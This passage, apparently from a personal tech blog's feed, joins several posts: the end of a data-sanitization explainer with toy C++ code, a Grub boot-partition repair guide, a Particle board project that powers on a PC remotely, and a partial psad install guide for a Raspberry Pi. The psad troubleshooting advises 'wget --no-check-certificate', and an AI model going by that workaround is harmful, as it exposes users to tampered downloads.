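        c = static_cast<char>(byte ^ pad);
    }
    return out;
}

// Hypothetical encrypted storage: the ciphertext is the house behind the
// gate, and the key is the piece of paper with the gate's password.
struct ToyEncryptedDisk {
    std::string ciphertext;
    std::optional<std::uint32_t> key;

    ToyEncryptedDisk(const std::string& plaintext, std::uint32_t k)
        : ciphertext(xorWithKeystream(plaintext, k)), key(k) {}

    // Cryptographic sanitization: destroy the key, keep the ciphertext.
    void cryptoErase() { key.reset(); }

    std::optional<std::string> read() const {
        if (!key) return std::nullopt;
        return xorWithKeystream(ciphertext, *key);
    }
};
```

<p>Because XOR is its own inverse, running <code>xorWithKeystream</code> over the ciphertext with the original key restores the plaintext, even after <code>cryptoErase()</code> has run. That is exactly the "someone made a copy of the paper" weakness.</p>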
<h2>Digital Sanitization</h2>
<p>Now we reach the stronger techniques for sanitizing data. Both remaining techniques resort to destroying the house, but differentiating between the two can be difficult for the non-technical reader. For this reason, I'm going to keep my explanation brief and stick to the house analogy I've been using up to this point, even though doing so will introduce some vagueness. If you're interested in really understanding the difference between digital and analog sanitization, I plan to write a later article dedicated to this distinction using a different analogy better suited to the task.</p>
<p>Continuing along with the house analogy, digital sanitization is comparable to me taking a bulldozer, leveling the house, and then throwing the pieces into a dumpster and taking that dumpster with me. Now you cannot visit the house because the house simply doesn't exist.</p>
<p>Or can you?</p>
<p>As it turns out, there is still information about the house left behind! For example, you might study the depression in the ground left behind after the house was removed. Based on its size and depth, you might be able to approximate the house's dimensions; even though the house no longer exists. In fact, and this is where the house analogy breaks down, if you know enough about the construction of houses similar to the one that was destroyed, it is actually possible to reconstruct a perfect copy of the original house!</p>
<h2>Analog Sanitization</h2>
<p>Finally, at least in the scope of this article, we get to analog sanitization. As you've probably anticipated by now, this is the strongest of the four sanitization techniques covered in this article. Using the house analogy, this would be comparable to me not only destroying the house, but then also digging up the dirt on the property, replacing it with new dirt, and leveling it. Now there are no remaining indicators that a house ever existed at any time in that spot, so there is nothing left from which to reconstruct a replica house. The data is truly gone at this point, so long as I have indeed destroyed every trace of the original house and the impact it had on its environment. That's a pretty big conditional claim I just made, but I'll leave it at that.</p>
<h2>Afterword</h2>
<p>This article ended up becoming more conceptual than I originally intended, but I hope the analogy made the concepts I covered approachable. As mentioned, I hope to eventually write a follow-up article using another analogy that better explains the difference between digital and analog sanitization. I also hope to write a practical counterpart to this article for those who would like to know more about how to securely delete the data from their electronic devices.</p>The importance of boot partitions in Linux systems.2015-10-20T22:30:00-04:002015-10-20T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-20:/boot-partition.html<p>Over the weekend, the lab I work in experienced a power outage. After power was restored, one of our servers failed to boot. It ultimately became my responsibility to figure out whether the server could be repaired, and failure wasn't an option: the server was configured (with no backups) to run a bunch of services and hosted lots of data (with no backups) for many users. Typical sysop problem (lol), but our lab has no personnel for managing the systems, so there I was.</p>
<p>In the process of finding and fixing the issue, I learned a lot of specifics regarding how the Grub bootloader and Linux work during system boot, so I decided to document my experience for future reference by others. This documentation will be lengthy, so if you only care about avoiding this type of problem, skip ahead to the Remediation section.</p>
<h2>Finding the Problem</h2>
<p>The server in question was a Dell PowerEdge T620 running Ubuntu. The server had two Intel Xeon processors, about 128GB of RAM, and three 2TB hard drives connected to a RAID controller.</p>
<p>The problem occurred during system start-up. The BIOS would start Grub, and then Grub would produce the error <code>error: attempt to read or write outside of disk hd0</code>. After that, the Linux kernel would start, but shortly after would spit out a stack trace and crash.</p>
<p>My first response was to run a disk check on the hard drives to make sure there weren't any problems with their sectors, but this turned up nothing. The disks were operating normally. This meant that the problem was most likely related to Grub.</p>
<h2>Diagnosing the Problem</h2>
<p>Since the error message was coming from Grub, the next thing I did was try to start the Linux kernel manually. The easiest way to do this is to press 'c' when the Grub menu appears. This will start a Grub command shell through which operating systems can be manually booted.</p>
<h3>Understanding Partitions</h3>
<p>Before explaining the commands I used while in the Grub command shell, I'll summarize some basics regarding partitions here.</p>
<p>First, hard drives and their partitions can be accessed in Linux via the "/dev" directory. In most modern Linux systems, hard drive names start with "sd" followed by a letter designating the drive: "sda", "sdb", "sdc", etc. Partition names consist of the drive name followed by a number. The hard drive "sda", for example, might have the partitions "sda1", "sda2", and so forth in the "/dev" directory.</p>
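<p>Grub also uses the notion of disks and partitions, but the naming syntax is a little different. The syntax takes the form "(hd#,#)", where the first # represents the disk number and the second # represents the partition on that disk: "(hd0,1)", "(hd0,2)", and so on. In Grub 2, disks are numbered starting from 0 while partitions are numbered starting from 1, so "sda1" usually corresponds to "(hd0,1)".</p>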
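<p>As a rough sketch, the correspondence between the two naming schemes can be written as a small C++ function. The name <code>linuxToGrub</code> is hypothetical, and the mapping rests on an assumption: that the BIOS orders the disks the same way Linux does (sda to hd0, sdb to hd1, and so on), which is common but not guaranteed. Depending on the version, Grub's <code>ls</code> may also print the partition table type, as in "(hd0,msdos1)" or "(hd0,gpt1)"; this sketch only produces the shorter form.</p>

```cpp
#include <optional>
#include <string>

// Sketch: translate a Linux partition name such as "sda1" into Grub 2's
// "(hdX,Y)" notation. Assumes the BIOS orders disks the same way Linux does
// (sda -> hd0, sdb -> hd1, ...), which is common but not guaranteed, and only
// handles single-letter drive names (sda through sdz).
std::optional<std::string> linuxToGrub(const std::string& dev) {
    if (dev.size() < 4 || dev.compare(0, 2, "sd") != 0) return std::nullopt;

    char drive = dev[2];
    if (drive < 'a' || drive > 'z') return std::nullopt;

    // Everything after the drive letter must be a partition number >= 1.
    std::string partition = dev.substr(3);
    if (partition[0] == '0') return std::nullopt;
    for (char c : partition) {
        if (c < '0' || c > '9') return std::nullopt;
    }

    // Grub 2 numbers disks from 0 but partitions from 1, like Linux does.
    return "(hd" + std::to_string(drive - 'a') + "," + partition + ")";
}
```

<p>For example, "sda1" maps to "(hd0,1)" and "sdb2" to "(hd1,2)", while a whole-disk name like "sda" or a non-"sd" device yields no result.</p>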
<h3>Boot Sequence</h3>
<p>While I'm covering general Linux background knowledge, I'll also mention a portion of the boot sequence for Linux because this will also be important for understanding the Grub commands. In most Linux systems which boot using the BIOS (as opposed to newer EFI or UEFI booting) the critical pieces are: BIOS, Grub, initrd, and vmlinux.</p>
<p>BIOS stands for Basic Input/Output System and is the first thing the system executes upon receiving power. Once started, the BIOS performs some basic system checks and then loads and executes the bootloader. There are many bootloaders out there, but Linux systems tend to use one called Grub. Grub's job is to load into memory the pieces that are necessary to start the operating system. In the case of Linux, the two important pieces which Grub needs to load into memory are initrd and vmlinux. I won't discuss these files in great detail, but to explain them briefly, vmlinux is the Linux kernel itself (usually stored compressed, in a file named vmlinuz), and initrd is the initial RAM disk: a small, temporary root file system containing the drivers and essential programs the kernel needs to find and mount the real root file system. Grub loads both files into memory and then starts the kernel, which uses initrd to bring up the full operating system. Once the real root file system is mounted, the system switches over to it and the memory used by initrd is freed.</p>
<h3>Diagnosing Grub</h3>
<p>Now that I've covered all the necessary background information, on to the Grub commands.</p>
<p>The first step is to find where the boot directory is on the system. First, list all the partitions on the system:</p>
<div class="highlight"><pre><span></span><code>grub> ls
</code></pre></div>
<p>This will create a list of all the partitions on the system. The next step is to figure out which one contains Grub, initrd, and vmlinux (since we're trying to boot a Linux operating system). This can also be done with the list command:</p>
<div class="highlight"><pre><span></span><code>grub> ls (hd0,1)
grub> ls (hd0,1)/boot
</code></pre></div>
<p>Once we've found the location of the boot files, set that partition as Grub's root device:</p>
<div class="highlight"><pre><span></span><code>grub> set root=(hd0,1)
</code></pre></div>
<p>I used "hd0,1" in the above commands, but you might find the boot files in a different partition. Either way, the boot files for a Linux system should always be either in the root directory of the partition (if that partition is a standalone boot partition) or in "/boot" (if that partition also holds other files).</p>
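<p>After we've found the correct root partition, we next need to tell Grub where the kernel (vmlinuz, the compressed vmlinux image) and initrd files are:</p>
<div class="highlight"><pre><span></span><code>grub> linux /boot/vmlinuz root=/dev/sda1
grub> initrd /boot/initrd.img
</code></pre></div>
<p>Note that the <code>linux</code> command needs to be passed the parameter "root". This parameter should be the partition which holds the Linux operating system, which may or may not be the same partition holding the boot files. On Ubuntu, the actual file names usually include a version suffix (for example, "vmlinuz-" or "initrd.img-" followed by the kernel version), and pressing Tab in the Grub shell will complete them for you.</p>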
<p>Once all the files have been specified, all that's left is to boot the operating system:</p>
<div class="highlight"><pre><span></span><code>grub> boot
</code></pre></div>
<p>At this point, Linux should start up. Of course, our lab's server was failing to boot, so this didn't happen. Instead, the error mentioned at the beginning appeared when I tried to execute the initrd command, which told me that initrd was the problematic file. So how do we fix this?</p>
<h2>Remediation</h2>
<p>So what went wrong? Basically, the problem was with the partitions on the server's hard drives. When Grub tried to load the initrd file into memory, it reached the end of what it could read from the hard drive before reaching the end of the file. In our case, the RAID controller makes the hard drives appear as a single 4TB drive. This is quite large, and the initrd file could reside anywhere in those 4TB. As it turns out, Grub could not address the location on disk where our initrd file was stored and therefore couldn't load it. So the power outage was not the direct cause of our problem. At some point, most likely during an Ubuntu update, the initrd file was rewritten and ended up in a location on the logical hard drive which Grub can't reach.</p>
<p>The solution to this problem is to keep the boot files in a small partition which resides at the start of the hard drive. For those readers who skipped straight to this section, that's all you need to know. When you install a Linux system, you really should make a dedicated 256MB partition for holding the boot files, even though most Linux installers do not require you to do this.</p>
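<p>To put numbers on why the start of the disk is safe: one commonly cited cause of Grub's "outside of disk" error is a BIOS disk interface that can only handle 32-bit sector numbers. Whether that exact limit applied to our server is an assumption, so treat this C++ sketch (with the hypothetical name <code>reachableBy32BitLba</code>) as an illustration only. With 512-byte sectors, 32-bit sector numbers reach at most 2<sup>32</sup> × 512 bytes = 2 TiB, so a file written past that point on a 4TB logical drive can't be read, while anything in a small partition at the start of the disk always can.</p>

```cpp
#include <cstdint>

// Assumed limit: a BIOS disk interface that only handles 32-bit sector
// numbers with 512-byte sectors. Real limits depend on the BIOS and the
// RAID controller firmware.
constexpr std::uint64_t kSectorSize = 512;
constexpr std::uint64_t kMaxSectors = std::uint64_t{1} << 32;
constexpr std::uint64_t kReachableBytes = kMaxSectors * kSectorSize;  // 2 TiB

// Can every byte of a file stored at [offset, offset + length) be read?
bool reachableBy32BitLba(std::uint64_t offset, std::uint64_t length) {
    return offset + length <= kReachableBytes;
}
```

<p>A 50MB initrd sitting 1MB into the disk passes this check, while the same file placed 3TB into the logical drive does not.</p>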
<p>In my case, however, I couldn't just reinstall the operating system, so in the following paragraphs I'll describe how I migrated the boot files in my already existing Linux installation into a new dedicated boot partition.</p>
<h2>Creating a Boot Partition in an Existing Linux Installation</h2>
<p>I started by flashing a copy of Ubuntu to a flash drive and booting it. There are plenty of tutorials on the internet about how to boot Ubuntu from a flash drive, so I'll forgo those instructions here.</p>
<p>The first thing I did was use gparted to create a new partition to serve as our dedicated boot partition. Since the hard drive is already partitioned, doing this requires shrinking the main partition and shifting it 256MB over. This frees up space at the start of the hard drive which can then be formatted into the new dedicated boot partition. If you've never used gparted before, I recommend using the GUI version since it's pretty intuitive. The new partition can be formatted as "ext4" and needs to have the "boot" flag enabled. Completing the shift will take a while, so you'll probably want to do this overnight.</p>
<p>Once the new partition has been created, we next need to copy the existing "/boot" directory's contents over to the new partition. This can be done by mounting the two partitions while still in the Ubuntu Live USB. In the following commands, sda2 is my main partition and sda4 is the new boot partition:</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>-s
mkdir<span class="w"> </span>/mnt/sda2
mkdir<span class="w"> </span>/mnt/sda4
mount<span class="w"> </span>/dev/sda2<span class="w"> </span>/mnt/sda2
mount<span class="w"> </span>/dev/sda4<span class="w"> </span>/mnt/sda4
cp<span class="w"> </span>-R<span class="w"> </span>/mnt/sda2/boot/*<span class="w"> </span>/mnt/sda4/
rm<span class="w"> </span>-rf<span class="w"> </span>/mnt/sda2/boot/
mkdir<span class="w"> </span>/mnt/sda2/boot
umount<span class="w"> </span>/mnt/sda2
umount<span class="w"> </span>/mnt/sda4
</code></pre></div>
<p>Finally, Linux and Grub need to be reconfigured so they know that the "/boot" directory is now in a separate partition. This can be done manually by modifying Grub's "grub.cfg" file and Linux's "/etc/fstab" file, but for simplicity, you can use <a href="https://help.ubuntu.com/community/Boot-Repair">Boot Repair</a>. If you choose to go the Boot Repair route, make sure to open the advanced options in the GUI and go through all of them. Specifically, you need to make sure the "boot partition" option is set to your new boot partition and the "main operating system" option is set to your main partition. Also, make sure the "set boot flag" option is pointed at your new boot partition; you can save a lot of time by disabling the "check filesystem for errors" option. If you instead decide to go the manual route, you'll need to edit "grub.cfg", looking for every "hd" reference and changing it to point at the correct partitions, and you'll need to add an entry to the fstab file that mounts your new partition at "/boot" during start-up.</p>
<p>If you do everything correctly, this should fix your Linux system and prevent similar issues from arising in the future.</p>
<h2>Conclusion</h2>
<p>Even though modern Linux installers do not require you to create a separate partition for the boot files, I recommend doing it anyway, especially if you have large hard drives. Otherwise, you might run into the problem I did.</p>Using internet of things to turn on a computer.2015-09-18T11:16:00-04:002015-09-18T11:16:00-04:00Carter Yagemanntag:carteryagemann.com,2015-09-18:/desktop-remote-switch.html<p><center>
<img alt="particle wired to motherboard" src="https://carteryagemann.com/images/desktop-interals.jpg">
</center></p>
<p>Here's a fun and quick but practical hack using a small <a href="https://www.particle.io/">Particle</a> board to turn a computer on and off from anywhere over the internet.</p>
<p>This project takes under an hour and is a good little assignment for anyone looking to learn some basic hardware hacking with useful applications.</p>
<h2>The Scenario</h2>
<p>I have a computer in my apartment which I mostly use for playing video games, but sometimes I like to access it remotely over the internet to do server tasks for me. The problem though is that gaming desktops use a lot of <a href="http://hardware.slashdot.org/story/15/09/01/1318231/">electricity</a> when they're running. So running the computer 24/7 would be too wasteful.</p>
<p>Instead, I want to be able to turn on my computer from anywhere on the internet; whenever I desire to use it remotely.</p>
<p>This can be achieved using "wake-on-LAN" (<a href="https://en.wikipedia.org/wiki/Wake-on-LAN">WoL</a>), but unfortunately my desktop's motherboard is too old to support this. So instead, I decided to connect a <a href="https://store.particle.io/">Particle Core</a> to my desktop's motherboard so it can turn on the computer for me!</p>
<h2>Particle</h2>
<p><img alt="particle" src="https://carteryagemann.com/images/particle-core.jpg"></p>
<p>For this hack, I used a Particle Core because that's what I had lying around, but a Photon would work just as well and is only $19. For the sake of brevity, I'm going to skip the details of how to set up and configure your Particle device. If this is your first time using Particle, they have a tutorial <a href="https://docs.particle.io/guide/getting-started/start/core/#getting-to-know-you">here</a>.</p>
<h2>ATX Motherboards</h2>
<p>My motherboard is an ATX board, but the process should be similar for other common motherboard form factors.</p>
<p>So how does pushing the power button turn on your computer? Your motherboard has two pins on it which are used to turn on the computer:</p>
<p><img alt="pin diagram" src="https://carteryagemann.com/images/pin-diagram.jpg"></p>
<p>One of the two pins (labeled Power Switch in the above diagram) holds a 3.3V to 5V charge and the other pin is ground. When you press the power button, the circuit is completed, allowing the charged pin to discharge into the ground pin. The motherboard detects this drop in voltage and treats it as the signal to power up.</p>
<p>For our project, we're going to do the same thing, only instead of using a button, we're going to use a Particle.</p>
<h2>Wiring the Particle</h2>
<p>The circuit is pretty simple, and with the right supplies you won't even need to solder anything! Once you've identified which pins on your motherboard are for the power switch, you can use the simple diagram below to wire everything up. All we're going to do is run a wire from one of the digital pins on the Particle to one of the power switch pins and then another wire from the Particle's ground to the other pin. I also added a small 220 ohm resistor to the ground wire just to make sure the Particle doesn't get fried.</p>
<p><img alt="schematic" src="https://carteryagemann.com/images/schematic.jpg">
<img alt="particle wired to motherboard labeled" src="https://carteryagemann.com/images/desktop-interals-labled.jpg"></p>
<h2>Software</h2>
<p>One of the nice things about Particle's boards is that they all communicate with Particle's cloud. This allows us to write our code through Particle's web interface and then the cloud can remotely flash the Particle. No need to open the case!</p>
<p>The following is the source code for our Particle:</p>
<div class="highlight"><pre><span></span><code><span class="cm">/**</span>
<span class="cm"> * Mobo Power - Copyright 2015 Carter Yagemann</span>
<span class="cm"> * </span>
<span class="cm"> * This program allows a core to power on a motherboard over the internet!</span>
<span class="cm"> * </span>
<span class="cm"> * This program is free software: you can redistribute it and/or modify</span>
<span class="cm"> * it under the terms of the GNU General Public License as published by</span>
<span class="cm"> * the Free Software Foundation, either version 3 of the License, or</span>
<span class="cm"> * (at your option) any later version.</span>
<span class="cm"> * </span>
<span class="cm"> * This program is distributed in the hope that it will be useful,</span>
<span class="cm"> * but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="cm"> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<span class="cm"> * GNU General Public License for more details.</span>
<span class="cm"> */</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">setup</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// D0 will control the motherboard</span>
<span class="w"> </span><span class="n">pinMode</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span><span class="w"> </span><span class="n">OUTPUT</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// ATX boards maintain high power on their power pin and then ground</span>
<span class="w"> </span><span class="c1">// shortly to signal that the motherboard should power up. So we</span>
<span class="w"> </span><span class="c1">// normally want the pin to be in the high state.</span>
<span class="w"> </span><span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span><span class="w"> </span><span class="n">HIGH</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// Register a function with Particle's cloud service so we can invoke</span>
<span class="w"> </span><span class="c1">// the core from over the internet.</span>
<span class="w"> </span><span class="n">Spark</span><span class="p">.</span><span class="n">function</span><span class="p">(</span><span class="s">"poweron"</span><span class="p">,</span><span class="w"> </span><span class="n">powerOn</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">loop</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// Nothing to do</span>
<span class="p">}</span>
<span class="kt">int</span><span class="w"> </span><span class="nf">powerOn</span><span class="p">(</span><span class="n">String</span><span class="w"> </span><span class="n">command</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// Switch the pin to low for half a second so the motherboard knows</span>
<span class="w"> </span><span class="c1">// it's time to turn on.</span>
<span class="w"> </span><span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span><span class="w"> </span><span class="n">LOW</span><span class="p">);</span>
<span class="w"> </span><span class="n">delay</span><span class="p">(</span><span class="mi">500</span><span class="p">);</span>
<span class="w"> </span><span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span><span class="w"> </span><span class="n">HIGH</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>Once we've flashed our Particle with this software, all that's left is to use it!</p>
<h2>Pressing the button... from anywhere in the world</h2>
<p>You can communicate with your Particle through their REST API. The simplest way to do this is with a curl command:</p>
<div class="highlight"><pre><span></span><code>curl<span class="w"> </span>https://api.particle.io/v1/devices/device_id/powerOn<span class="w"> </span>-d<span class="w"> </span><span class="nv">access_token</span><span class="o">=</span>access_token
</code></pre></div>
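<p>Where <code>device_id</code> is the ID of your Particle and <code>access_token</code> is your account's access token. Note that cloud function names are case-sensitive, so the last part of the URL path must match the name registered with <code>Spark.function</code> in <code>setup()</code>, which is <code>poweron</code>.</p>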
<p>And that's it! Hopefully you've found this tutorial to be useful. If you have any questions or comments, you can contact me via any of the means listed on my <a href="https://carteryagemann.com/index.html">homepage</a>.</p>
<p><em>Happy hacking!</em></p>Installing psad on Raspberry Pi Running Arch Linux2015-02-13T11:00:00-05:002015-02-13T11:00:00-05:00Carter Yagemanntag:carteryagemann.com,2015-02-13:/psad-on-pi.html<p>I've been fooling around with intrusion detection systems (IDS), specifically psad, and I thought it would be fun to try installing psad on my Raspberry Pi. Little did I know, installing psad on an ARM processor running Arch Linux with systemd is not a simple process. It took a great deal of effort to get psad running correctly, so I thought I'd take the time to document my struggles in the hopes that this will be useful to someone else.</p>
<h1>What is psad?</h1>
<p>psad (Port Scan Attack Detector) is an intrusion detection system (IDS) that works by monitoring the log messages generated by iptables (a network firewall common to most Linux distros) to detect port scans and other suspicious traffic. You can find more information on psad <a href="http://cipherdyne.org/psad/">here</a>.</p>
<h1>Scope of this document</h1>
<p>The focus of this document is on the challenges I ran into while installing and running psad on a Raspberry Pi, and on how I solved them. This document does not cover how to configure or use psad. It <em>does</em> cover things I had to take into consideration because the Raspberry Pi's CPU is an ARM processor and because my OS is Arch Linux with systemd.</p>
<h1>Contact</h1>
<p>Many of my solutions are hacks and probably suboptimal hacks at that. If you see anything wrong with this guide or have better solutions to the problems I covered here, feel free to contact me at <a href="mailto:cmyagema@syr.edu">cmyagema@syr.edu</a>.</p>
<h1>Other Useful Resources</h1>
<ul>
<li><a href="http://cipherdyne.org/psad/">psad homepage</a></li>
<li>An installation guide that helped me <em>(Edit: This blog no longer exists)</em></li>
<li><a href="https://www.digitalocean.com/community/tutorials/how-to-use-psad-to-detect-network-intrusion-attempts-on-an-ubuntu-vps">A guide on configuring psad</a></li>
</ul>
<h1>Installing psad for ARM from AUR</h1>
<p>Since psad is not included in the main Arch Linux repositories, it has to be downloaded, built, and installed from the Arch User Repository (AUR).</p>
<p>First, create a file (I will name it <code>list.txt</code>) containing the following URLs:</p>
<div class="highlight"><pre><span></span><code>https://aur.archlinux.org/packages/pe/perl-unix-syslog/perl-unix-syslog.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-parse/perl-iptables-parse.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-chainmgr/perl-iptables-chainmgr.tar.gz
https://aur.archlinux.org/packages/ps/psad/psad.tar.gz
</code></pre></div>
<p>These are the tarballs we need from the AUR: psad itself and the three Perl modules it depends on.</p>
<p>Next, run the following commands to download the tarballs, extract them, build the packages, and install them. The Perl modules are installed first because psad depends on them:</p>
<div class="highlight"><pre><span></span><code>cat<span class="w"> </span>list.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>xargs<span class="w"> </span>wget
tar<span class="w"> </span>xzvf<span class="w"> </span>perl-iptables-parse.tar.gz
<span class="nb">cd</span><span class="w"> </span>perl-iptables-parse
makepkg<span class="w"> </span>-Acs
sudo<span class="w"> </span>pacman<span class="w"> </span>-U<span class="w"> </span>perl-iptables-parse-1.1-2-any.pkg.tar.xz
<span class="nb">cd</span><span class="w"> </span>..
tar<span class="w"> </span>xzvf<span class="w"> </span>perl-unix-syslog.tar.gz
<span class="nb">cd</span><span class="w"> </span>perl-unix-syslog
makepkg<span class="w"> </span>-Acs
sudo<span class="w"> </span>pacman<span class="w"> </span>-U<span class="w"> </span>perl-unix-syslog-1.1-4-any.pkg.tar.xz
<span class="nb">cd</span><span class="w"> </span>..
tar<span class="w"> </span>xzvf<span class="w"> </span>perl-iptables-chainmgr.tar.gz
<span class="nb">cd</span><span class="w"> </span>perl-iptables-chainmgr
makepkg<span class="w"> </span>-Acs
sudo<span class="w"> </span>pacman<span class="w"> </span>-U<span class="w"> </span>perl-iptables-chainmgr-1.2-2-any.pkg.tar.xz
<span class="nb">cd</span><span class="w"> </span>..
tar<span class="w"> </span>xzvf<span class="w"> </span>psad.tar.gz
<span class="nb">cd</span><span class="w"> </span>psad
makepkg<span class="w"> </span>-Acs
sudo<span class="w"> </span>pacman<span class="w"> </span>-U<span class="w"> </span>--force<span class="w"> </span>psad-2.2.3-1-armv6h.pkg.tar.xz
</code></pre></div>
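<p>Since the four packages are built the same way, the steps above can also be written as a loop over <code>list.txt</code>. This is a sketch rather than the exact commands above: it assumes the tarballs have already been downloaded into the current directory, it uses <code>makepkg -i</code> to install each package instead of calling <code>pacman -U</code> with an exact file name, and the function names are hypothetical. Note that the commands above pass <code>--force</code> when installing psad; if pacman reports file conflicts for psad, you may still need to install that package by hand.</p>

```shell
# Sketch: build and install every AUR tarball listed in list.txt, in the
# order the URLs appear (the Perl modules first, psad last).

# Turn a tarball URL into its package directory name, e.g.
# https://aur.archlinux.org/packages/ps/psad/psad.tar.gz -> psad
pkg_name() {
  basename "$1" .tar.gz
}

build_from_list() {
  local list=$1 url name
  # Read the list on fd 3 so makepkg/pacman prompts still read the terminal.
  while IFS= read -r url <&3; do
    [ -n "$url" ] || continue    # skip blank lines
    name=$(pkg_name "$url")
    tar xzf "$name.tar.gz"
    # -A: ignore the PKGBUILD arch list (needed on ARM), -c: clean up
    # afterwards, -s: install repo dependencies, -i: install the result.
    (cd "$name" && makepkg -Acsi) || return 1
  done 3< "$list"
}
```

<p>With the functions defined, run <code>build_from_list list.txt</code> from the directory containing the tarballs.</p>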
<p>If you are luckier than I was, this is all you have to do. However, I ran into several additional problems, which the rest of this document focuses on.</p>
<h1>Configuration</h1>
<p>As I mentioned earlier, I am not going to cover how to configure psad. There is, however, one setting worth mentioning because it differs from other systems: the system log is in an unusual location, because systemd writes its logs to the journal instead of to a traditional syslog file.</p>
<p>To fix this setting, list the contents of your <code>/var/log/journal/</code> directory. You should see a directory whose name is a long string of letters and numbers (your machine ID), and inside that directory should be a file called <code>system.journal</code>. I found that this is the file psad has to be pointed to.</p>
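<p>The lookup can also be done with <code>find</code>. A minimal sketch, assuming the standard journal layout; the function name is hypothetical, and the journal root is a parameter so it can be tried against another directory:</p>

```shell
# Sketch: print the path of the persistent system journal file.
# Journal files live one level down, in a directory named after the
# machine ID; user-*.journal files in the same directory are ignored.
find_system_journal() {
  local root=${1:-/var/log/journal}
  find "$root" -mindepth 2 -maxdepth 2 -type f -name system.journal | head -n 1
}
```

<p>Because the directory is named after the machine ID, <code>/var/log/journal/$(cat /etc/machine-id)/system.journal</code> should point to the same file.</p>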
<p>Once you have identified this path, open <code>/etc/psad/psad.conf</code> and point <code>IPT_SYSLOG_FILE</code> to this file. In my case, this means:</p>
<div class="highlight"><pre><span></span><code>IPT_SYSLOG_FILE /var/log/journal/37ed4fd73b0c416886710f1c8ffa083b/system.journal;
</code></pre></div>
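<p>If you prefer to make this edit from the command line, <code>sed</code> can do it. A sketch, assuming the setting sits on a single line beginning with <code>IPT_SYSLOG_FILE</code> (as in the example above) and that the path contains no <code>|</code> or <code>&amp;</code> characters; the function name is hypothetical:</p>

```shell
# Sketch: point IPT_SYSLOG_FILE in a psad.conf at the given path, keeping
# the original file as <conf>.bak. The path must not contain | or &,
# which are special in this sed expression.
set_ipt_syslog_file() {
  local conf=$1 path=$2
  sed -i.bak "s|^IPT_SYSLOG_FILE[[:space:]].*|IPT_SYSLOG_FILE $path;|" "$conf"
}
```

<p>From a root shell, for example: <code>set_ipt_syslog_file /etc/psad/psad.conf /var/log/journal/37ed4fd73b0c416886710f1c8ffa083b/system.journal</code> (substituting your own machine ID), then <code>systemctl restart psad</code> so psad rereads its configuration.</p>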
<p>If you want to port scan the Pi yourself, or otherwise test your psad installation, keep in mind that the Raspberry Pi has very limited computing resources, so it may take a while for your test to show up in psad's status output.</p>
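<p>Rather than rerunning <code>psad -S</code> by hand, you can poll it. The helper below is a hypothetical sketch: it reruns a command until its output contains a fixed string, and it assumes the scanning host's IP address appears in the <code>psad -S</code> output once psad has flagged it.</p>

```shell
# Sketch: rerun a command until its output contains a fixed string.
#   wait_for_match STRING TRIES DELAY_SECONDS COMMAND [ARGS...]
# Returns 0 as soon as STRING appears, 1 after TRIES failed attempts.
wait_for_match() {
  local pattern=$1 tries=$2 delay=$3 i=0
  shift 3
  while [ "$i" -lt "$tries" ]; do
    if "$@" 2>/dev/null | grep -qF -- "$pattern"; then
      return 0
    fi
    i=$((i + 1))
    # Only sleep if another attempt is coming.
    [ "$i" -lt "$tries" ] && sleep "$delay"
  done
  return 1
}
```

<p>For example, from a root shell after scanning the Pi from another machine at the (hypothetical) address 192.168.1.50, <code>wait_for_match 192.168.1.50 20 30 psad -S</code> checks every 30 seconds for roughly ten minutes.</p>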
<h2>Troubleshooting</h2>
<h3>wget fails due to certificates</h3>
<p>This one is easy: replace <code>cat list.txt | xargs wget</code> with <code>cat list.txt | xargs wget --no-check-certificate</code>. Keep in mind that this disables TLS certificate verification for these downloads.</p>
<h3>makepkg fails and returns a build error</h3>
<p>Try rebooting the Raspberry Pi and running the build again. The build can fail when the Pi runs out of memory, and a reboot frees up memory held by other processes.</p>
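<p>To check whether memory is the culprit, look at how much is available before starting the build (<code>free -m</code> shows this too). A small sketch that reads the <code>MemAvailable</code> field from <code>/proc/meminfo</code>, assuming a kernel new enough (3.14 or later) to provide that field; the function name is hypothetical:</p>

```shell
# Sketch: print available memory in MiB, read from /proc/meminfo (or a
# saved copy passed as $1). Fails if there is no MemAvailable line.
mem_available_mib() {
  awk '/^MemAvailable:/ { print int($2 / 1024); found = 1 }
       END { exit !found }' "${1:-/proc/meminfo}"
}
```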
<h3>psad is installed, but when I run <code>sudo psad -S</code> I get the message <code>pid file [...]/psadwatchd.pid does not exist</code></h3>
<p>If you're seeing this towards the top of the output for <code>sudo psad -S</code>:</p>
<div class="highlight"><pre><span></span><code><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="c"> psad: pid file /var/run/psad/psadwatchd</span><span class="nt">.</span><span class="c">pid does not exist for psadwatchd on HOSTNAME</span>
</code></pre></div>
<p>Then you probably have the same problem I had.</p>
<p>This was the most painful of the problems I ran into, and it was big enough to convince me to write this document. If I hadn't run into this issue (and the systemd logging issue), I wouldn't have bothered writing any of this. In my case, the problem was that psadwatchd, psad's watchdog daemon, wasn't starting when psad started, for reasons I never pinned down. To confirm that this is the source of the problem, run:</p>
<div class="highlight"><pre><span></span><code>ps -A | grep "psad"
</code></pre></div>
<p>If you only see one process called "psad" and no "psadwatchd", then you're having the same problem as me.</p>
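<p>The same check can be scripted. This sketch (the function name is hypothetical) reads <code>ps -A</code> output on standard input, looks at the last column, which holds the command name, and reports which daemon is missing:</p>

```shell
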